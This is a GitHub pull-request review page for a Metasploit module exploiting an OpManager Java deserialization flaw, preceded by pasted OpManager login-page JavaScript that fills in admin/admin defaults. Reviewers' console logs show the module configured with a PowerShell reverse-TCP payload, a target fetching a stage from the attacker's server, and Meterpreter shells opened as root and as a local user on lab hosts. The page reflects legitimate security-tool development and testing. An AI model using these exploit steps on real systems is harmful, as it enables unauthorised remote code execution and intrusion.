						<div class='unable2StartEmail'>
							<img src='/apiclient/fluidicv2/img/mail.png'>
							<b>Email:</b>
							<span>opmanager-support@manageengine.com</span>
						</div>
					</div>
				</div>
			</div>
		</div>
</div>
</body>
<script LANGUAGE="JavaScript">
ntlmAuth();
function ntlmAuth()
{
	if(ntlm)
	{
		document.loginForm.ntlmv2.value = "true";
		document.loginForm.j_username.value = ntlmuser;
		document.loginForm.submit();
	}
}
function selectADLogin()
{
	document.loginForm.AUTHRULE_NAME.value="ADAuthenticator"; //No I18N
	$('#domainNameDiv').attr({
		name:'domainName', //No I18N
		value:document.loginForm.domainNameAD.value
	});
}

function selectLocalLogin()
{

	//var placeholder = document.loginForm.domainNameAD.value;
	if(document.loginForm.domainNameAD === undefined || document.loginForm.domainNameAD.value === undefined || document.loginForm.domainNameAD.value === "Authenticator")
	{
		document.loginForm.AUTHRULE_NAME.value="Authenticator"; //No I18N
		$('#domainNameDiv').removeAttr('name value'); //No I18N
	//	placeholder ="Local Authentication";
	}
	else if(document.loginForm.domainNameAD.value == "radiusUserLogin")
	{
		document.loginForm.AUTHRULE_NAME.value="RadiusAuthenticator"; //No I18N
	//	placeholder ='Radius Authentication';
		$('#domainNameDiv').removeAttr('name value'); //No I18N
	}
	else 
	{
		selectADLogin();
	}
	//	 placeholder = placeholder+' '+'User Name';
		//$('#userName').attr('placeholder',placeholder);//No I18N
}
detectOSnBrowser();
function detectOSnBrowser(){
	var OSName='unkown_OS';//No I18N
	if(navigator.appVersion.indexOf('Win')!=-1){OSName='Windows';}//No I18N
	if(navigator.appVersion.indexOf('Mac')!=-1){OSName='MacOS';}//No I18N
	if(navigator.appVersion.indexOf('X11')!=-1){OSName='UNIX';}//No I18N
	if(navigator.appVersion.indexOf('Linux')!=-1){OSName='Linux';}//No I18N
	$('body').addClass(OSName);

	var browserName='unkown_Browser';//No I18N
	if(/Chrome/.test(navigator.userAgent) && /Google Inc/.test(navigator.vendor)){browserName='chrome';}//No I18N
	if(/Safari/.test(navigator.userAgent) && /Apple Computer/.test(navigator.vendor)){browserName='safari';}//No I18N
	if(navigator.userAgent.indexOf('Opera')!=-1){browserName='opera';}//No I18N
	if(navigator.userAgent.indexOf('Firefox')!=-1){browserName='firefox';}//No I18N
	if((navigator.userAgent.indexOf('MSIE')!=-1)||(!!document.documentMode==true)){browserName='ie';}//No I18N
	$('body').addClass(browserName);

	if(navigator.userAgent.match(/Trident.*rv:11\./)){$('body').addClass('ie11');}//No I18N
}
WindowHtWd();
function WindowHtWd(){
	var wHt=$(window).height();
	if(wHt<='939' && $('.eventbanner').offset()!==undefined){
		var topPos='-'+$('.eventbanner').offset().top+'px';//No I18N
		$('.eventbanner').css({top:topPos});
	}
}
</script>
</html>


<script type="text/javascript">

//ignorei18n_start
$(document).ready(function()
{
	if($('#domainDiv').length==1){
		$('#LoginDiv').addClass('domainField');
	}

	$('.select2').select2({minimumResultsForSearch:-1});
	var ieDetails = IeVersionCheck();
	if (ieDetails.IsIE && ieDetails.TrueVersion < 10) {
		if(ieDetails.TrueVersion <= 7) {
			$('body').addClass('ie7');
		}
		doIEHandling(true);
    } else if (ieDetails.IsIE && ieDetails.CompatibilityMode && ieDetails.ActingVersion < 10) {
		doIEHandling(true, true);
		if(ieDetails.ActingVersion <= 7) {
			$('body').addClass('ie7');
		}
    } else {
		doIEHandling(false);
	var loginAdsContent = "";
	var loginPagingContent=""
	var cnt=1;
	var scrWidth = 0;
	var play;
	var language = "";
	language = '';
	//collect images path from ZOHO Creator
	
		/*	var scrWidth = document.body.scrollWidth;
			if(scrWidth < 1400)
			document.body.className = "loginBody2"

			// $('#btnSubmit').click(function() {
			// 	loginSubmit();
			// });

			$('div.sliderClosebt').hover(
			  function () {
				$(this).show();
				$('div.sliderClosebtTxt').show();
			  },
			  function () {

			  }
			);

			$('div.sliderClosebtTxt').hover(
			  function () {
				$(this).show();
				$('div.sliderClosebt').show();
			  },
			  function () {

			  }
			);

			$('div.sliderClosebt.selected').hover(
			  function () {
				$(this).show();
				$('div.sliderClosebt').show();
			  },
			  function () {

			  }
			);

			$('#folio_block').hover(
			  function () {
				$('div.sliderClosebt').show();
				$('div.sliderClosebtTxt').show();
			  },
			  function () {
				$('div.sliderClosebt').hide();
				$('div.sliderClosebtTxt').hide();
			  }
			);

			$('#opmDftLogo1').hover(
			  function () {
				  if(cnt>1)
				  {
					$('div.sliderClosebt').show();
					$('div.sliderClosebtTxt').show();
				  }
			  },
			  function () {
				if(cnt>1)
				{
					$('div.sliderClosebt').hide();
					$('div.sliderClosebtTxt').hide();
				}
			  }
			);


			jQuery('div.folio_block').hoverIntent({
					over: makeCloseBtShow,
					timeout: 500,
					out: makeCloseBtHide
				});
*/
			
			 	loadCredentialsFromCookie();
			 
			//userType();

			//Message box show and hide
			// $('.loginCloseicon').click(function(){
			// 	$(".loginMsgBox").slideUp(400);
			// });

			/* $('#frmTleRightlinksclick').click(function(){
			 	$(".loginMsgBox").slideDown(400);
			 	$("#errorDiv").hide();
			 });*/
			
			 $('#frmTleRightlinksclick').click(function(){
			 	$("#loginFirst").slideDown(1000);
			 	$("#userName").val("admin");
			 	$("#password").val("admin");
			 	$("select[name=domainNameAD]").val("NULL");
			 	$("input[name=authType]").val("localUserLogin");
			 	$("#errorDiv").hide();
		/*	 	document.getElementById('password').type = 'password';
			 	setOpacityInputPwd();
			 	setOpacityInputUser();*/
			 });
			
		}
			
	/*var default_Domain = '';//No I18N		
	$('#authenticationDiv select[name="domainNameAD"]').select2().val(default_Domain)//.trigger('change'); //No I18N	
	$('#authenticationDiv select[name="domainNameAD"]').select2();
	*/	
});
//Start Slider close button show hide
function makeCloseBtShow()
{
$("#sliderClosebt").show();
}
function makeCloseBtHide()
{
$("#sliderClosebt").hide();
}
// Start Close Slider Image
function closeSliderImage()
{
	if ($("#folio_block").css('display') == 'block')
	{
		clearInterval(play); //Stop the rotation
		$("#opmDftLogo1").show();
		$("#folio_block").hide();
		$('.loginPaging').hide();
		//$('#sliderClosebt').hide();
		//$('div.hdrMnuUnSelectBG.selected').removeClass('selected');//No I18N
		$('div.sliderClosebt').addClass('selected');                  //No I18N
		$('div.sliderClosebtTxt').html('webclient.loginpage.show.ad');
		$.ajax({
		 url: "/LoginPage.do",			//No I18N
	  	 data: "ShowAds=false",
		 cache: false,
		 success: function(response) {
	       }
	});
	}
	else
	{
		$("#opmDftLogo1").hide();
		$("#folio_block").show();
		$('.loginPaging').show();

		$('div.sliderClosebt.selected').removeClass('selected');//No I18N
		//$('div.sliderClosebt').addClass('sliderClosebt');
		$('div.sliderClosebtTxt').html('webclient.loginpage.close.ad');
		//clearInterval(play); //Stop the rotation
		//rotate(); //Trigger rotation immediately
		//rotateSwitch(); // Resume rotation
		$.ajax({
		 url: "/LoginPage.do",			//No I18N
	  	 data: "ShowAds=true",
		 cache: false,
		 success: function(response) {
	       }
	});

	}

}

//Start Slider loading JS function
function loadSliderImage()
{
	$("#loader").hide();

	$(".loginPaging").show();
	$(".loginPaging a:first").addClass("active");

	var imageWidth = $(".window1").width();
	var imageSum = $(".image_reel img").size();
	var imageReelWidth = imageWidth * imageSum;

	$(".image_reel").css({'width' : imageReelWidth});

//Paging + Slider Function
	rotate = function(){
		var triggerID = $active.attr("rel") - 1; //Get number of times to slide
		var image_reelPosition = triggerID * imageWidth; //Determines the distance the image reel needs to slide

		$(".loginPaging a").removeClass('active'); //Remove all active class
		$active.addClass('active'); //Add active class (the $active is declared in the rotateSwitch function)

//Slider Animation
		$(".image_reel").animate({
			right: -image_reelPosition
		}, 500 );

	};

//Rotation + Timing Event
	rotateSwitch = function()
	{
		play = setInterval(function(){ //Set timer - this will repeat itself every 3 seconds
			$active = $('.loginPaging a.active').next();
			if ( $active.length === 0) { //If paging reaches the end...
			//	$active = $('.loginPaging a:first'); //go back to first
			}
			rotate(); //Trigger the paging and slider function
		}, 10000); //Timer speed in milliseconds (3 seconds)
	};

	rotateSwitch(); //Run function on launch

//On Hover
	$(".image_reel a").hover(function() {
		clearInterval(play); //Stop the rotation
	}, function() {
		rotateSwitch(); //Resume rotation
	});

//On Click
	$(".loginPaging a").click(function() {
		$active = $(this); //Activate the clicked paging
		//Reset Timer
		clearInterval(play); //Stop the rotation
		rotate(); //Trigger rotation immediately
		rotateSwitch(); // Resume rotation
		return false; //Prevent browser jump to link anchor
	});


//customize check box
	$(".checkBox,.checkBoxClear").click(function(srcc)
    {
        if ($(this).hasClass("checkBox"))
        {
            $(this).removeClass("checkBox");
            $(this).addClass("checkBoxClear");
        }
        else
        {
            $(this).removeClass("checkBoxClear");
            $(this).addClass("checkBox");
        }
    });


//Start Setfocus
		$('input:text:first').focus();
		$('input:text').bind("keydown", function(e)
		 {
			var n = $("input:text").length;

			if (e.which == 13)
			{ //Enter key
			  e.preventDefault(); //Skip default behavior of the enter key
			  var nextIndex = $('input:text').index(this) + 1;
				  if(nextIndex < n-1)
				  {
					$('input:text')[nextIndex].focus();
				  }
				  else
				  {
					$('input:text')[nextIndex-1].blur();
					$('#btnSubmit').click();
				  }
			}
		  }); 
}
function IeVersionCheck() {
    var value = {
        IsIE: false,
        TrueVersion: 0,
        ActingVersion: 0,
        CompatibilityMode: false
    };

    //Try to find the Trident version number
    var trident = window.navigator.userAgent.match(/Trident\/(\d+)/);
    if (trident) {
        value.IsIE = true;
        //Convert from the Trident version number to the IE version number
        value.TrueVersion = parseInt(trident[1], 10) + 4;
    }

    //Try to find the MSIE number
    var msie = window.navigator.userAgent.match(/MSIE (\d+)/);
    if (msie) {
        value.IsIE = true;
        //Find the IE version number from the user agent string
        value.ActingVersion = parseInt(msie[1]);
    } else {
        //Must be IE 11 in "edge" mode
        value.ActingVersion = value.TrueVersion;
    }

    //If we have both a Trident and MSIE version number, see if they're different
    if (value.IsIE && value.TrueVersion > 0 && value.ActingVersion > 0) {
        //In compatibility mode if the trident number doesn't match up with the MSIE number
		value.CompatibilityMode = value.TrueVersion != value.ActingVersion;
    }
	return value;
}
//Start Browser checking for IE
function doIEHandling(notSupportedIE, iscompatibilityMode)
{
	var objref = document.getElementById('ie6_statusmsg');
	//if(jQuery.browser.msie && jQuery.browser.version=="6.0")
     if(notSupportedIE)
	 {
		 //jQuery(".loginMsgBox").slideUp(400);
		 //document.getElementById("forgotPassStatus").style.display="block";
		 //document.getElementById("loginHolderdisable").style.display="block";
		 //document.getElementById("authenticationDiv").style.display="none";

		/* document.getElementById("LoginDiv").style.display="none";
		 var posLeft = (document.body.offsetWidth-896)/2;
		 objref.style.left= posLeft+'px';
		 objref.style.top = 30+'px';*/
		//  objref.style.display = 'block';
		// document.body.className = ""
		document.getElementById("form1").style.display = 'none';
		document.getElementById("browserNotSupportDiv").style.display = 'block';
		if(iscompatibilityMode) {
			$('.browserNotSupportClass').hide();
		} else {
			$('.compatibilityModeClass').hide();
		}
	 }
	 else
	 {
		// document.getElementById("form1").style.display = 'block';
		// document.getElementById("authenticationDiv").style.display="block";
		// document.getElementById("forgotPassStatus").style.display="none";

		$('#authenticationDiv').css({left:'0',opacity:'1'});
    	$('#forgotPasswordDiv').css({left:'100%',opacity:'0'});

		//document.getElementById("loginHolderdisable").style.display="none";
		objref.style.display = 'none';
	 }
}
// ignorei18n_end

	setincheckbox();
	selectLocalLogin();


</script>


[*] An HTTP session cookie has been issued
[-] Exploit aborted due to failure: unexpected-reply: Could not identify the remote version number
[*] Exploit completed, but no session was created.



Version 12.5.328 on Windows Server 2019

Powershell Target

msf6 > use exploit/multi/http/opmanager_sumpdu_deserialization
[*] Using configured payload cmd/windows/powershell_reverse_tcp
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set rhost 192.168.140.149
rhost => 192.168.140.149
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > options

Module options (exploit/multi/http/opmanager_sumpdu_deserialization):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   CVE        Automatic        yes       Vulnerability to use (Accepted: Automatic, CVE-2020-28653, CVE-
                                         2021-3287)
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.140.149  yes       The target host(s), see https://github.com/rapid7/metasploit-fr
                                         amework/wiki/Using-Metasploit
   RPORT      8060             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be
                                         an address on the local machine or 0.0.0.0 to listen on all add
                                         resses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated
                                         )
   TARGETURI  /                yes       OpManager path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (cmd/windows/powershell_reverse_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   LHOST         192.168.140.1    yes       The listen address (an interface may be specified)
   LOAD_MODULES                   no        A list of powershell modules separated by a comma to downloa
                                            d over the web
   LPORT         4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Command


msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows Command
   1   Windows Dropper
   2   Windows PowerShell
   3   Unix Command
   4   Linux Dropper
   5   Python


msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set target 2
target => 2
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > run

[*] Started reverse TCP handler on 192.168.140.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] An HTTP session cookie has been issued
[*] Detected version: 12.5.328
[*] The request handler has been associated with the HTTP session
[*] Sending stage (200262 bytes) to 192.168.140.149
[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.149:49896) at 2021-09-17 16:30:28 -0500

meterpreter > getuid
Server username: WIN-D4KCH4DS7I8\space
meterpreter > sysinfo
Computer        : WIN-D4KCH4DS7I8
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >






Sorry, something went wrong.

space-r7 reviewed 19 days ago
View changes
documentation/modules/exploit/multi/http/opmanager_sumpdu_deserialization.md

1. Download an affected version for either Windows or Linux from the
[archive][0] 1. Run the installer executable as root 1. Accept the default
values for all settings (skip registration) 1. Navigate to
`/opt/ManageEngine/OpManagerCentral/bin`

Copy link
Contributor


SPACE-R7 19 DAYS AGO

Looks like older Linux versions might be under the
/opt/ManageEngine/OpManager/bin path, so that could be added here

Sorry, something went wrong.


Copy link
Contributor Author


ZEROSTEINER COMMENTED 17 DAYS AGO

For the 12.3.295 on Windows Server 2019 which is failing because it can't
identify the version number, you'll have to set it to the 2020 CVE.
Unfortunately the version detection uses an aspect of the logon page that isn't
present in the older versions. After the CVE option is set, it should work just
fine though.

👍 1

Sorry, something went wrong.

Copy link
Contributor


SPACE-R7 COMMENTED 16 DAYS AGO

> For the 12.3.295 on Windows Server 2019 which is failing because it can't
> identify the version number, you'll have to set it to the 2020 CVE.
> Unfortunately the version detection uses an aspect of the logon page that
> isn't present in the older versions. After the CVE option is set, it should
> work just fine though.

That worked great, thanks!

msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set cve CVE-2020-28653
cve => CVE-2020-28653
msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > run

[*] Started reverse TCP handler on 192.168.140.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] An HTTP session cookie has been issued
[*] The request handler has been associated with the HTTP session
[*] Using URL: http://0.0.0.0:8080/rO59AnzQl4
[*] Local IP: http://192.168.1.199:8080/rO59AnzQl4
[*] Client 192.168.140.135 (Wget/1.20.3 (linux-gnu)) requested /rO59AnzQl4
[*] Sending payload to 192.168.140.135 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (3012548 bytes) to 192.168.140.135
[*] Command Stager progress - 135.34% done (157/116 bytes)
[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.135:32826) at 2021-09-20 09:01:17 -0500
[*] Server stopped.

meterpreter > getuid
Server username: root @ ubuntu (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 192.168.140.135
OS           : Ubuntu 20.04 (Linux 5.11.0-34-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >






Sorry, something went wrong.

space-r7 added a commit that referenced this issue 16 days ago
Land #15670, add opmanager sumpdu deser module
Verified
This commit was signed with the committer’s verified signature.
space-r7 Shelby Pace
GPG key ID: DE80BD86F1B96C84 Learn about vigilant mode.
Loading status checks…
fee037a
Hide details View details space-r7 merged commit 4bccc05 into rapid7:master 16
days ago
20 checks passed


Copy link
Contributor


SPACE-R7 COMMENTED 16 DAYS AGO

Added the older path for the Linux installations and fixed a typo in 327aefd.
Code looked good to me, and the module worked across a large number of versions
(all that I had previously tested after leveraging the CVE option).



Sorry, something went wrong.

Copy link
Contributor


SPACE-R7 COMMENTED 16 DAYS AGO


RELEASE NOTES

The exploit/multi/http/opmanager_sumpdu_deserialization module implements an
exploit (CVE-2020-28653) and patch bypass (CVE-2021-3287) for a Java
deserialization vulnerability that exists in numerous versions of ManageEngine's
OpManager software. Arbitrary code as the NT AUTHORITY\SYSTEM user on Windows or
the root user on Linux is achieved by sending a PDU to the SmartUpdateManager
handler.



Sorry, something went wrong.


Sign up for free to join this conversation on GitHub. Already have an account?
Sign in to comment
Reviewers

space-r7

smcintyre-r7

adfoster-r7

Assignees

space-r7

Labels
docs module rn-modules
Projects
None yet
Milestone
No milestone
Linked issues

Successfully merging this pull request may close these issues.

None yet

5 participants

Add this suggestion to a batch that can be applied as a single commit. This
suggestion is invalid because no changes were made to the code. Suggestions
cannot be applied while the pull request is closed. Suggestions cannot be
applied while viewing a subset of changes. Only one suggestion per line can be
applied in a batch. Add this suggestion to a batch that can be applied as a
single commit. Applying suggestions on deleted lines is not supported. You must
change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied. This suggestion has been applied or
marked resolved. Suggestions cannot be applied from pending reviews. Suggestions
cannot be applied on multi-line comments.

 * © 2021 GitHub, Inc.
 * Terms
 * Privacy
 * Security
 * Status
 * Docs

 * Contact GitHub
 * Pricing
 * API
 * Training
 * Blog
 * About


You can’t perform that action at this time.
You signed in with another tab or window. Reload to refresh your session. You
signed out in another tab or window. Reload to refresh your session.